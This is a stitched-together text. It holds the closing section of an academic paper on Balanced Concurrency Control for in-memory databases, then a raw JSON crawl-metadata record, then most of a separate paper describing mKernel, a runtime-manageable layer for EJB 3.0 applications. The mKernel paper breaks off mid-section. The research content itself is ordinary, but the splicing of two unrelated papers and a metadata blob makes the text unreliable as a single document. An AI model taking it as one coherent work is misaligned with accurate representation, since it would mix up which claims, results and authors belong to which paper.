OLTP on modern hardware. Our design and implementation benefits from existing in-memory OLTP systems. Databases such as Hyper [16] and H-Store [15] adopt the partitioning approach to scale. Harizopoulos et al. [15] analyzed the overheads of the Store database. Pandis et al. [22] eliminated the overhead of centralized lock manager with partitioning. Porobic et al. [23] systematically compared the performance of shared-nothing and shared-everything OLTP system designs on multi-socket, multi-core CPUs. Faleiro et al. [10] redesigned the multiversion concurrency control method for in-memory databases by avoiding bookkeeping operations for read and global timestamp allocator, but it requires all the transactions to be submitted to the database before they can be processed.
Doppel [21] introduced an in-memory database designed for transactions that contend on the same data item. It proposed splitting the contended data item across cores such that each core can continue updating the data item in parallel. The per-core value was reconciled before the data item can be read. Doppel’s optimization is orthogonal to BCC: Doppel improves performance when w dependencies happen, while BCC avoids false aborts caused by w dependencies.
8. CONCLUSION
In this paper we have presented the Balanced Concurrency Control (BCC) mechanism for in-memory databases. Unlike OCC that aborts a transaction based on whether the transaction’s read set has changed, BCC aborts transactions based on the detection of essential patterns that will always appear in unserializable transaction schedules. We implemented BCC in Silo, a representative OCC-based in-memory database and comprehensively compared BCC with OCC and 2PL with TPC-W-like, TPC-C-like and YCSB benchmarks. Our performance evaluations demonstrate that BCC outperforms OCC by more than 3x and 2PL by more than 2x when data contention is high; meanwhile, BCC has comparable performance to OCC in low-contention workloads.
9. ACKNOWLEDGEMENTS
We thank the anonymous reviewers for their constructive comments. The work was supported in part by the National Science Foundation under grants OCI-1147522, CNS-1162165, and CCF-1513944.
10. REFERENCES
|
{"Source-Url": "http://web.cse.ohio-state.edu:80/hpcs/WWW/HTML/publications/papers/TR-16-1.pdf", "len_cl100k_base": 14047, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 45245, "total-output-tokens": 17511, "length": "2e13", "weborganizer": {"__label__adult": 0.00037479400634765625, "__label__art_design": 0.0004019737243652344, "__label__crime_law": 0.0003783702850341797, "__label__education_jobs": 0.000942707061767578, "__label__entertainment": 0.0001436471939086914, "__label__fashion_beauty": 0.00019121170043945312, "__label__finance_business": 0.00067901611328125, "__label__food_dining": 0.0003936290740966797, "__label__games": 0.0016012191772460938, "__label__hardware": 0.004974365234375, "__label__health": 0.000667572021484375, "__label__history": 0.0004673004150390625, "__label__home_hobbies": 0.0001327991485595703, "__label__industrial": 0.0008401870727539062, "__label__literature": 0.0003066062927246094, "__label__politics": 0.0003859996795654297, "__label__religion": 0.0005822181701660156, "__label__science_tech": 0.377197265625, "__label__social_life": 7.599592208862305e-05, "__label__software": 0.02392578125, "__label__software_dev": 0.583984375, "__label__sports_fitness": 0.0002760887145996094, "__label__transportation": 0.0007266998291015625, "__label__travel": 0.00021207332611083984}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 72766, 0.03869]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 72766, 0.65734]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 72766, 0.89796]], "google_gemma-3-12b-it_contains_pii": [[0, 5506, false], [5506, 12266, null], [12266, 17898, null], [17898, 24752, null], [24752, 32166, null], [32166, 38692, null], [38692, 44338, null], [44338, 50144, null], [50144, 56034, null], [56034, 60719, null], [60719, 66598, null], [66598, 72766, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5506, true], [5506, 12266, null], [12266, 17898, null], [17898, 24752, null], [24752, 32166, null], [32166, 38692, null], [38692, 44338, null], [44338, 50144, null], [50144, 56034, null], [56034, 60719, null], [60719, 66598, null], [66598, 72766, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 72766, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 72766, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 72766, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 72766, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 72766, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 72766, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 72766, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 72766, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 72766, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 72766, null]], "pdf_page_numbers": [[0, 5506, 1], [5506, 12266, 2], [12266, 17898, 3], [17898, 24752, 4], [24752, 32166, 5], [32166, 38692, 6], [38692, 44338, 7], [44338, 50144, 8], [50144, 56034, 9], [56034, 60719, 10], [60719, 66598, 11], [66598, 72766, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 72766, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-06
|
2024-12-06
|
511016d23a62776c7252ef7ad0160973a3742e7c
|
mKernel: A manageable kernel for EJB-based systems
Jens Bruhn
Distributed and Mobile Systems Group
Feldkirchenstr. 21
96052 Bamberg, Germany
jens.bruhn@wiai.uni-bamberg.de
Guido Wirtz
Distributed and Mobile Systems Group
Feldkirchenstr. 21
96052 Bamberg, Germany
guido.wirtz@wiai.uni-bamberg.de
ABSTRACT
Due to the ever increasing complexity of today’s Enterprise Applications (EA), component technology has become the major means to keep the development of such applications under control. Although container technology provides tools to deploy component-based EAs, high demands regarding, e.g., availability, security and fault-tolerance combined with constantly changing user demands, varying loads and rapid change of business processes, introduce the need for adjusting systems in regular intervals without halting, restructuring and re-deploying the system as a whole. Consequently, the administration of EAs is a very complex task which has to be performed during runtime of the managed system. Hence, techniques from the area of Autonomic Computing (AC) that allow for controlling and changing a running system without the need to go back to development can become highly useful. This paper presents the design rationale and overall architecture of a manageable kernel that equips the broadly accepted Enterprise Java Beans 3.0 (EJB) component standard for enterprise applications with additional facilities in order to make EJB components AC manageable at runtime. The system was realized EJB 3.0-compliant and provides container infrastructure enhancements as well as a tool needed to adapt standard EJB components.
Keywords
Enterprise Applications, EJB, Management, mKernel
1. INTRODUCTION
Enterprise Applications (EA) represent a family of very complex software systems used for supporting the business of companies. Their complexity emerges from the different application areas within which they are used in combination with a high degree of interrelation among those areas, e.g. ordering and warehousing. Additionally, the environment of an EA constantly changes due to strategic and operative aspects. An EA might on the one hand be extended to integrate solutions for demands arising from new business areas of the operating company. On the other hand, certain parts of an application might be deactivated in case they should not be provided anymore. If workload increases, decreases, or shifts, administrators of an EA might face the need to reorganize the system in response. Certain parts of an EA might be provided to external users, e.g. to suppliers or customers. Especially those parts must be isolated and protected to a very high degree regarding security aspects. Types of threats will probably change over time leading to constant administrative demand. The manifold areas of possible adjustments, in combination with the inherent complexity of systems render the task of administration very complex. Additionally, the very high demands on availability of EAs leads to the need to perform adjustments of a system during runtime. A complete system shutdown in combination with an offline re-configuration would be very costly and probably lead to a loss of reputation, even when the downtime is very short. Consequently, this option seems to be unacceptable, especially if it has to be carried out in more or less regular intervals.
The concept of Component Orientation (CO) [22] represents one approach for establishing a software system in a modular way. The modules—called Components—a system is built from, encapsulate functionality and expose it through well defined Interfaces to their environment. In return they can make use of other components through their provided interfaces. An interface required by a component is called Receptacle. Consequently, a component-based system can be seen as a collection of loosely-coupled modules which collaborate among each other through their interfaces. Therefore, different functional aspects of a system can be treated in isolation and a modular design of software systems is promoted. Normally, a component is developed with respect to a certain Component Standard. A standard defines different obligations regarding the implementation of components. In return, a component implementation can rely on concepts provided by the standard. Besides other aspects, e.g. the target programming language or application area, component standards differ with respect to the number and type of included features. While some standards might only standardize formats for message exchange, others might also include specifications for services and facilities, or deployment formats for components. An implementation of a component standard is called Component Platform. A platform must implement at least all recommended parts of the underlying standard and can realize the optional ones. Moreover, it is possible to enhance the underlying standard with additional features. Relying on
optional or non-standard features for the development of components imposes the risk for the implementation of not being usable with all standard-compliant platforms. Typically, a platform includes a runtime environment for components, called Container, which provides the services and facilities of the corresponding standard. One broadly accepted standard for component-oriented EA systems based on the Java programming language is the Enterprise Java Beans-standard (EJB), currently available in version 3.0 [8, 9]. This standard provides a reasonable component-model and a rich set of services and facilities, e.g. for persistence management and transaction control. Additionally, the isolated treatment of different aspects – e.g. application logic and security – allows separation of concerns for development, execution, and administration.
While the concept of CO facilitates the development and initial configuration of complex systems, the vision of Autonomic Computing (AC) [13, 16, 18] was developed to find a solution for handling the constantly increasing complexity of todays and future computer systems during runtime. Its main idea relies on the assignment of low-level administrative tasks upon the managed system itself. A promising approach for addressing the complexity of EAs during development and runtime could consequently be to bring together the concepts of CO with the vision of AC. Therefore, a component platform must be enhanced with facilities and services allowing managing entities to gather information about the structure and behavior of the underlying component-based EA. Additionally, the manipulation of the component system must also be supported. The enhancements should be highly generic to ensure that they can be used within lots of contexts with respect to self-management properties [21].
Within this paper we discuss a system of component-based enhancements on top of the EJB 3.0 standard, called mKernel. It can be used to establish a sound and extensible foundation for AC in the context of EAs. The system is realized through a set of components which can be deployed into an EJB-compliant container. The main contribution of mKernel lies on its platform specific approach of providing a generic manageable layer regarding applications developed for the considered platform. It enables the provision of facilities for monitoring and re-configuration on a unified foundation. Compared to existing platforms for AC like [12, 14], mKernel is not intended to be used for managing different types of resources. Because of being platform specific, it is possible to rely on guidelines of a standard which enable the realization of very fine-grained and rich opportunities for analysis and control in a homogeneous fashion. Unified sensors and effectors prevent from the need to address characteristics of different types of managed resources, thus reducing complexity for the management layer. Manageability is integrated into managed resources automatically.
Therefore, autonomic management needs not be considered for the core application logic and development is facilitated. Moreover, mKernel is intended to control the participating components of the managed layer on a low level for providing a very high degree of re-configuration freedom. Domain specific approaches for the Java Enterprise Edition like [3, 4] address the management of J2EE-based systems on deployment level. In contrast, mKernel focuses on the detailed management of components during runtime. Moreover, our realization does not require any adjustment of the underlying container implementation.
The remainder of this paper is structured as follows: Section 2 discusses the different requirements of AC addressed by the presented system. To get a grip on the advantages and shortcomings of the underlying component-standard, section 3 briefly introduces those parts of the EJB-standard that are essential for the presented system. In section 4 the architecture of the constituting components for autonomic management as well as the enhanced facilities needed are discussed. Necessary extensions to EJB components are treated in section 5. Afterwards, mKernel is evaluated against the requirements stated in section 2, and the results of first performance evaluations of the implementation are discussed in section 6. The paper concludes with a summary and a discussion of future work in section 7.
2. REQUIREMENTS
With his paper [16], Paul Horn established the foundation for the vision of AC. As part of this paper, eight recommended characteristics are stated for AC-systems, i.e. Anticipatory, Self-Healing, Self-Protection, Self-Optimization, Self-Configuration, Self-Awareness, Context-Awareness, and Openness. While there is no terminological consensus regarding these AC characteristics in literature yet, this core collection has broadly been adopted [19]. Anticipatory addresses the ability of an AC-system to anticipate the goals of its users. The four following characteristics are merely Objectives to reach the superior goal of Self-Management [18, 21]. They cover reactions of the system to certain situations, like e.g. failures (Self-Healing), attacks (Self-Protection), or varying resource needs (Self-Optimization). In this context Self-Configuration can be seen as generic, supporting the others via facilities for adjusting the system accordingly. Self-Awareness and Context-Awareness both address the information demand of an AC-system to fulfill its duties. While the first one considers the introspection into the internals of the system, the second one addresses the need to gather information about its environment. Finally, Openness can be seen as a generally desirable property for AC-systems, i.e. an AC-system should be based upon open standards in contrast to being proprietary.
While the aforementioned characteristics deal with the question of what an AC-system should be capable of, the so-called Control Loop represents a concept for realizing these characteristics [10, 18]. It consists of the four stages as shown in figure 1. The first stage (monitor) includes all steps of information discovery addressing Self-Awareness and Context-Awareness. Secondly (analyze), the gathered information is analyzed regarding aspects of aggregation and detection of situations making modifications of the system necessary. In case the need for re-configuration is identified, the third stage (plan) assembles a collection of operations to transfer the system from the current into the desired state which should better fulfill the Objectives of the autonomic system. Finally (execute), these operations are performed. During execution of a control loop-cycle, internal Knowledge is used which e.g. covers information about symptoms of malicious behavior and options for re-configuration. It has to be pointed out that the control loop is not a one-way process. It is e.g. also conceivable that – during planning – additional information is needed which must be obtained from the managed system or its environment. This may lead to a selective execution of the monitor- and maybe the analyze-stage. Consequently, an autonomic system concep-
tually consists of two main layers. The original services a system provides to its users are allocated inside a Managed Layer which is supervised and manipulated by the Management Layer. Interaction with the managed layer takes place at the first and the last stage of the control loop. During monitoring, information is obtained via so-called Sensors while during execution Effectors are applied for re-configuration. Figure 1 also covers the interaction with the environment of the considered system during these stages of the control loop. This environment might also contain other autonomic systems. There are also architectures conceivable that make coordination among planning entities of different Management Layers necessary, like e.g. [6]. These are not covered explicitly in figure 1.
To provide a foundation for autonomic management of component-based EA systems, a manageable layer must be established on top of an existing component standard. The remainder of this section discusses three different classes of requirements for such a manageable layer: Manageability Requirements ensure sufficient functionality of the layer itself. Platform Requirements prevent the system from becoming proprietary. Development Requirements address the desired property of an AC-platform to hide manageability aspects from developers of the original business logic by means of preventing them from the need to program in a manner that is explicitly aware of manageability issues. Whereas the first class guarantees the overall functionality of the system, the latter ones should ease its wide-spread use for different containers as well as for existing components.
Manageability Requirements (MR) subsume all requirements directly related to the provided functionality for the management layer. Because they are essential for the establishment, they are indispensable.
MR-1: The manageable kernel must provide facilities or services to allow the management layer to gather information about the structure of managed EAs. This covers the constituting components and connections among them. The requirement is subsumed under the term structural inspection.
MR-2: Support for behavioral inspection must also be part of a manageable kernel. Interactions among components inside a container and across its boundaries must be observable in a fine-grained fashion. This does not only cover the occurrence of method calls itself but also information about call chains, potentially spanning multiple participating components.
MR-3: While structural inspection mainly address static aspects of the managed layer, behavioral inspection deals with dynamic aspects regarding the occurrence of different situations. To address the particular specifics of the different kinds of inspection, a manageable kernel should provide pull- and push-oriented information provision. While the former type involves information acquisition via the usage of different sensor-interfaces, the latter type relies on information supply through invocation of callback methods or capturing of events. A pull-oriented approach is desirable for obtaining static information, e.g. the set and structure of deployed components. For the occurrence of situations, e.g. the invocation of a method, push-oriented information of the management layer is preferable, both for timeliness- and performance reasons. Otherwise, the management layer has to poll for the occurrence of relevant situations in regular intervals. This would imply the risk of missing them.
MR-4: A managed layer must support a management layer with a rich set of opportunities for structural re-configuration of EAs during runtime. This covers the possibility to re-organize the internal architecture of an application via re-connecting its parts. Re-configuration should be supported on component- and instance-level, meaning that it should be possible to apply manipulation-instructions generally or for a concrete connection.
MR-5: In addition to the previous requirement which deals with the establishment of new connections, behavioral rerouting addresses the need to manipulate already existing connections. For this purpose it must be possible to re-route the invocation of a certain method to a new target. In case certain parts of the system should be isolated or protected, a manageable kernel must additionally provide the possibility to prevent the execution of incoming or outgoing method calls.
In summary, the previous requirements together address the need to support structural and behavioral reflection [20].
MR-6: The information used in the context of the previous requirements has to be based on a sound information model. It should be possible to identify related parts for information items and to put them into a context like, e.g. identifying the source of a method-call. Additionally, a relation must be established between the information obtained from sensors and the information needed at effectors.
MR-7: Extensibility is needed for the collection of provided sensors and effectors to cope with future needs. While a manageable kernel should provide a degree of manageability as high as possible, one must expect that the included facilities and services are not sufficient for all considerable future application areas. It should be possible to integrate extensions during runtime to prevent the need for a restart of a productive system. Furthermore, potential extensions should get by without any adjustments of certain components of the affected applications which would result in the need to un-deploy, adjust, and redeploy them. In particular, a solution which implies a partial or complete reboot of EAs would be unacceptable.
Platform Requirements (PR) include two aspects for broad usability of a provided kernel.
PR-1: For integration of autonomic management facili-
ties, there should be no need for adjusting the implementation of the underlying platform and its corresponding container. Otherwise – in case a concrete implementation is manipulated – each new release has to be adjusted accordingly. Moreover, the solution would be limited to a concrete container implementation for the addressed component-standard.
PR-2: No use of specific platform- or container-provided enhancements is permitted. This should lead to the usability of the kernel inside many environments. Similar to the previous requirement, the use of container-specific APIs or services as well as relying on optional parts of a standard provided by some containers would lead to a commitment to a concrete implementation which is not desirable. In summary, these requirements postulate that the integration of manageability should solely rely on the underlying component-standard. Basically, a violation of one of these requirements points out shortcomings in the implementation of the kernel or indicates that the underlying standard does not specify all aspects needed for the establishment of a manageable kernel.
Development Requirements (DR) address the development stage of the lifecycle of components and the influence of the manageable kernel onto their execution. Their fulfillment should support its acceptance.
DR-1: The insertion of sensors and effectors into components should be transparent for developers, i.e., developers are not responsible for ensuring manageability of their applications, e.g., via the usage of a recommended API. Generally, the integration of capabilities for autonomic management into containers as well as into components should not hinder the tasks of developers.
DR-2: No limitations regarding the use of services and facilities provided by the standard should be imposed on developers. They should be enabled to develop components as if there is no autonomic management performed.
DR-3: For the management of components there should exist no additional information needs. Consequently, a developer should not be enforced to write additional artifacts besides those recommended by the underlying component standard. Note that this requirement only refers to the basic aspects covered by a kernel. It does not imply that it should be generally avoided to include additional information about entities being target of autonomic management. This might be reasonable for concrete application areas of AC, but the fulfillment of the generic manageability requirements should get by without them.
DR-4: The preparation of components should be automated to a very high degree. It should be possible to provide a standard-compliant, deployment-ready component for which the integration of enhancements should be performed automatically.
DR-5: For the integration of a component into a container no complicated deployment process should be needed. Instead of that, the deployment should be realizable as intended by the provider of the original target container.
3. ENTERPRISE JAVA BEANS 3.0
Enterprise Java Beans represent a standard for distributed, component-oriented EAs implemented with the object-oriented programming language Java. The synonym Write Once, Run Anywhere (WORA) [8], P. 27 stands for two main goals of the development of the standard, namely interoperability and re-usability. It means that a component should be deployable into each container following the EJB-standard without the need to manipulate its source code anymore. Version 3.0 of the standard is available since May 2006. In [9] aspects of persistence management are covered which are of minor relevance for the kernel presented here. Therefore, [8] was considered as foundation for this paper which includes all aspects relevant for development, deployment and runtime of components. The standard was specified under the leadership of Sun Microsystems and is supported by well-known companies, e.g., IBM Corporation and Oracle Corporation. In the following, different aspects of the EJB 3.0 standard are discussed as far as they are relevant for the implementation of mKernel.
Building Blocks of Components: EJB-based components consist of a collection of so-called Enterprise Beans or Beans for short. Within the standard there are three different types of beans considered. Namely these are Message Driven Beans, and Stateless and Stateful Session Beans. Message driven beans can be used via sending asynchronous messages and provide no additional interfaces. Session beans provide interfaces of which the standard considers different types. The main difference between the two types of session beans lies within the provision of a client-specific state. Instances of stateful session beans are exclusively used by a single client and retain their state across multiple invocations. Consequently, this state is specific for a single client. Moreover, a client can rely on interacting with the same instance in case it uses the same reference for multiple invocations. Stateless session beans in contrast are usable by the container for handling method invocations originating from different clients. Furthermore, it is not guaranteed that a client, performing more than one method invocation on the same reference, is always interacting with the same session bean instance. An instance might keep its state during its lifetime. This client-neutral state might be the source of performance benefits, e.g., in case an open database connection is kept for reuse. One important property of session beans is, that they are by definition non-reentrant. Therefore, it is not possible that more than one method call is active on a session bean instance at any given time. Moreover, bean instances are not allowed to perform any kind of thread handling like e.g., starting new threads. A component is provided in terms of a so-called Bean-module. Besides the constituting beans, such a module covers additional artifacts like, e.g., a Deployment Descriptor (DD).
Component Composition: For gaining access to session beans and their interfaces, the container must – according to the standard – provide two alternative facilities which can be used in combination. On the one hand, an implementation of the Java Naming and Directory Interface (JNDI) [2] must be provided by each container which enables the lookup of bean references during runtime by submitting their name. It has to be pointed out that the entries of this naming facility can not be manipulated directly. On the other hand, in the context of the so-called Dependency Injection, dependencies of enterprise beans can be declared during development. This, amongst others, also covers the specification of receptacles. During execution, these are bound to a concrete session bean instance.
Interaction Control: To each enterprise bean an arbitrary number of Interceptors can be attached which includes
a specification of methods the interceptor is interested in. In case a method should be invoked upon a bean instance, the invocation is firstly directed to the matching interceptors, if any. These interceptors gather full control over the control flow and the submitted parameters. They might e.g. analyze or change parameters, or prevent the invocation from reaching its original target. The return value can also be subject of inspection and manipulation.
**Component Specification:** During implementation of a certain bean, developers can integrate different *Metadata-Annotations* into the source code for configuring the corresponding bean. It is e.g. possible to specify interfaces and receptacles as well as interceptors to attach. Through an XML-based DD, included in the component, it is possible to configure the beans of the corresponding component. The options for configuration cover all aspects of the metadata-annotations and open up additional opportunities on component-level, e.g. to attach a certain interceptor to all beans of a module. In case certain annotations refer to the same aspects of a bean as parts of the DD, the content of the DD is privileged. Hence, it is possible to adjust the configuration of a component and its constituting beans respectively without the need to manipulate their source code.
**Component Lifecycle:** After the development of the constituting beans is completed, they are assembled into a module. As preparation for its integration into the target container, a subsequent configuration can be performed upon the component. There is no procedure designated within the standard to adjust the configuration of a component during runtime. Consequently, the deployment is the latest time for the specification of configuration aspects discussed above concerning a certain module. A re-configuration must be performed outside the container and applied via redeployment of the affected module.
**Lifecycle of Enterprise Bean Instances:** For the instantiation of beans the EJB-standard specifies a special proceeding. A detailed discussion of the corresponding states, methods, and the specifics for the different bean types is omitted here for brevity. It has to be pointed out, that the injection of references for dependencies and the authorization to use them is performed in two separate steps consecutively. Only if the injection phase has finished completely, the bean instance is allowed to invoke operations upon the provided references. The beginning of the usage phase can optionally be identified by receiving the invocation of a so called *PostConstruct*-method. No method invocations regarding its application logic will be forwarded to the bean instance before the usage phase has started. All other state-transitions during the lifecycle of a bean instance are observable through similar method invocations, too. Moreover, all of these invocations are firstly directed to interested interceptors attached to the instance, if any.
Within the EJB-standard there are no subordinate aspects included which allow the supervision of the current state of a container regarding instances of beans, established connections among them, or ongoing method invocations. Moreover, it is not intended to re-configure components after their deployment.
## 4. ARCHITECTURE
This section presents the architecture of *mKernel* and the different components which have to be integrated into a container for making it ready for autonomic administration according to the requirements discussed in section 2. *mKernel* was built and tested on top of the *Glassfish Application Server* [1] which provides, amongst others, facilities for the *Java Platform Enterprise Edition*, an EJB container, and has proven itself of being compliant to the EJB standard to a very high degree. Therefore, it was considered a good foundation for the development. The facilities presented here, are realized as standard-compliant EJB modules and make use of the infrastructure provided by the container.
**Naming:** The implementation of JNDI, which is mandatory for each EJB-compliant container, is used to lookup references to session bean instances via submitting their name. Because *mKernel* is developed for usage in a multi-container environment, the lookup of session bean instances residing in a remote container is also be supported. Regarding this aspect, the EJB-standard has a shortcoming in that there is no specified standard-compliant way of how to dynamically access a session bean instance residing in a remote container through its *Remote Business Interface*. In fact, the *Glassfish Application Server* does not even provide a container-specific opportunity for dynamic connection establishment for this type of interface across container boundaries. Because remote business interfaces are the preferable choice for using the application logic of session beans, a solution had to be found. As foundation for naming, the *dyName* system was applied which we developed as independent solution for dynamic naming in EJB-based systems. *dyName* provides, amongst others, the required functionality. It is solely based on facilities specified by the EJB-standard, requires no enhancements of the applied container, and is encapsulated inside *mKernel*. Consequently, the application of *dyName* does not violate any of the requirements stated in section 2. For a detailed discussion of *dyName*, refer to [5]. The *Naming* facility is neither a sensor nor an effector but used as infrastructure for connection establishment.
**Connector:** While the *Naming* facility enables the actual establishment of connections, the *Connector* facility supports the specification of targets for connections during runtime. A request is submitted to the *Connector* including the originator of the request and a target mapped name as used for connection establishment in the context of the EJB-standard. As response the *Connector* delivers information processible by the *Naming* facility. Managing entities can define connection targets on different granularity levels, namely on container-, module-, bean- and instance level. Moreover, the *Connector* also provides the opportunity to re-route existing connections. In combination, this allows a fine grained steering of interactions taking place among managed beans. The *Connector* does not support any kind of state transfer from the original to the new target of a connection which would especially be critical in case a connection to a stateful session bean instance should be switched. We assume this of being application specific and not being solvable in a generic fashion. Consequently, the *Connector* facility provides an effector with a rich variety of options for controlling interconnections inside the managed layer. Therefore, the *Connector* is an effector allowing to re-configure the architecture of a component system during runtime.
**Deployment Information:** The *Deployment Information* facility is part of each module deployed in an autonomously manageable container. It provides information about included enterprise beans. The information covers all
relevant aspects of enterprise beans including amongst others interfaces, receptacles, and simple environment entries. Consequently, this facility delivers information about deployed components on type level. This also includes unique identifiers for each particular interface and concrete bean implementation. Consequently, it is possible to, e.g., identify all deployed implementations of a given interface to find candidates for a certain receptacle. In case of the identification of an error inside one bean implementation, the affected components can be easily found. Because of the allocation of the deployment information inside the corresponding module, it implies a built-in up-to-dateness. On removal of a component, its part of the information about the overall structure is implicitly removed, too. With the Deployment Information facility, a sensor is provided which allows – in combination with the information covered within the Connector – structural inspection of the managed layer.
Events: This facility represents a broker for event producers and -consumers. The event types provided for bean instances correspond to the lifecycle of beans as specified in the EJB-standard. Namely, these are the construction and destruction of all bean types, and additionally the passivation and activation of stateful session beans. Moreover, events for business calls on session bean instances and for message reception at message driven bean instances can be captured. The occurrence of exceptions in all of these contexts is also supported via corresponding events. The information provided for each event includes aspects of the context of its occurrence, like e.g. identifiers for the corresponding bean instances as well as for establishing a relation to the information of the Deployment Information facility. Additionally, for business calls, it is possible to deduce call chains spanning multiple bean instances which also covers the identification of the invoked methods. The non-reentrancy property of enterprise beans, in combination with the prohibition of starting new threads, leads to the opportunity to clearly identify dependencies among methods observed in the managed system. Local sequence numbers as well as information about the time and duration of an invocation are also included, which in combination allow an ordering of captured method invocations and an analysis of the fractions of the overall processing time of each call with respect to the different sub-calls, if any. Event consumers can register at the Events service through the provision of identifiers for producers of events in combination with a set of event types they are interested in. Again – as discussed in the context of the Connector – a fine-grained specification of producers is possible on container-, module-, bean-, and instance level. As a result a consumer receives a lease which it can renew on expiration if it is interested in obtaining the corresponding events further on. Producers are instructed to throw events via two complementary ways. On each registration of a consumer and on lease expiration, the affected modules are identified and instructed to start or stop producing the corresponding events. In case a module is deployed, there might already exist matching registrations. On first invocation of a bean instance of the new module, the submission of matching registrations is requested from the Events service for initialization. Afterwards, the module will be considered during each subsequent registration of a consumer as well as on lease expiration. Events are distributed via an approach consisting of two steps. Firstly, events are stored locally which allows a fast continuation of the method call under consideration. Secondly, a stateless session bean, which is integrated into each managed module, checks in regular intervals if there are any events to distribute. If so, these are published via Java Message Service (JMS) [15] applying a corresponding topic which is bound at a well known name inside the namespace of a container. This allows the asynchronous distribution of events to multiple consumers. Consequently, the Events service itself does not need to keep track of the different consumers. For each producer-type-pair it is only necessary to store the latest lease-timeout. In summary, the Events facility provides a push-oriented sensor for making the runtime behavior of a managed system observable.
Interceptors: The facilities discussed up to now provide sound effectors and sensors for the autonomic management of an EJB-based container. The Interceptors facility represents a generic opportunity to integrate additional aspects not already considered within mKernel. It allows the integration and removal of interceptors into a running component system. Again, the targets of interception can be controlled in a fine-grained way as discussed for the Events facility. Via interceptors it is possible to intercept any method-invocation upon enterprise bean instances covering calls on interfaces as well as calls regarding state transitions during their lifecycle. In this context, it is possible to be informed about the occurrence of a specific method invocation, to gain insight into the parameters of the call, to manipulate those parameters, or even to prevent the call from being forwarded to its original target. The return from a method invocation can also be intercepted which includes the opportunity to analyze and manipulate the return value. mKernel provides the opportunity to specify which of the different places of possible interception are of interest for a certain interceptor. It is e.g. possible to only intercept business method before they are reaching their original target, or to only intercept exceptions. Furthermore, context information for a method invocation is provided also, e.g. an identification of the caller, if known. The implementation was inspired by the Interceptors facility already designated as part of the EJB standard, but it provides a much higher degree of flexibility w.r.t. the built-in feasibility to re-configure the set of attached interceptors during runtime which is not provided by the EJB standard. mKernel-interceptors are realized through session beans, which means that the provider of an interceptor has to implement a certain interface and deploy the implementation in form of a module. Afterwards, the new interceptor must be registered at the Interceptors service. Interceptors are intended to be used temporary, e.g. during re-configuration or as reaction to failures. It is also possible to attach interceptors to beans permanently, but it has to be kept in mind that each invocation of an mKernel-base interceptor implies the invocation of an additional session bean which leads to a certain overhead. With the Interceptors facility a combined sensor and effector is provided which allows a fine grained intervention into interactions on Managed Layer.
Two of the facilities presented, namely Naming and Interceptors, can be seen as extensions of the facilities already considered in the EJB standard. For those, serious limitations were identified which had to be overcome for making them usable in the context of runtime re-configuration. Consequently, they were taken as foundation upon which the mKernel-specific facilities were realized. Deployment Infor-
mKernel takes on a managed system and because of limitations identified, the standard was neither usable directly nor as foundation. The other two facilities do not have any corresponding counterpart in the EJB standard itself or in related standards.
5. MANAGEABLE COMPONENTS
For making an EJB-module manageable, it has to be preprocessed by a tool being part of mKernel. This tool accepts a standard-compliant Java Archive (JAR) containing an EJB-module ready for deployment without any further configuration being necessary. The content of this module is manipulated and extended for making it autonomously manageable. Analysis, manipulations and extensions on bean level are performed via application of the Java Programming Assistant (Javassist) [7] which contains, amongst others, a very convenient API for analyzing and manipulating Java bytecode. The DD of the module is processed with the aid of the Java Architecture for XML Binding 2.0 (JAXB) [23]. For the generation of a new DD, covering manageable aspects, JAXB is also used. The steps performed upon a module by the tool are discussed in the following. For each enhancement performed, its particular contribution for mKernel is explained. Figure 2 presents an overview over the results of preprocessing a component. Additionally, it covers relations between integrated parts and the services discussed in section 4.
The first step during module preprocessing includes the extraction of the submitted JAR. This is performed to keep the submitted module in its original state for being usable without mKernel. Secondly, all class-files of the application are analyzed on bytecode-level – especially the metadata-annotations of the included beans – to collect information about the component regarding e.g. provided beans and declared dependencies. With this information a representation is generated that contains all relevant information. Afterwards, the DD of the module is parsed and a representation is generated also. Via merging of the two representations according to the demands of the EJB-standard a comprehensive image of the inspected module is gained. All interfaces and receptacles are extended by means of enhancing all provided methods with an additional parameter used by mKernel for forwarding context information along call chains. The original methods are provided further on to allow an external usage of the beans without even recognizing that they are managed by mKernel. The affected session beans are extended accordingly. Internally, the new method bodies solely consist of an invocation of the corresponding original methods. Therefore, the submission of context information is not even noticed by bean instances.
For all receptacles Wrappers are generated. These are used as replacement for connections to session beans during their creation. As shown in figure 2, all interaction among bean instances is performed through these wrappers, allowing the interception of the control flow. On invocation, wrappers contact the Connector which instructs them how to proceed. In case the connection should be switched, the Naming service is contacted for obtaining a new interaction endpoint. To prevent the establishment of connections that bypass mKernel, the usage of the container-provided naming facility is replaced with an alternative implementation without any effect on the container itself. This is done through integration of a Wrapped Context in combination with manipulating each part of the bytecode trying to open a connection to the naming facility of the container. This is redirected to the Connector and the Naming service of mKernel.
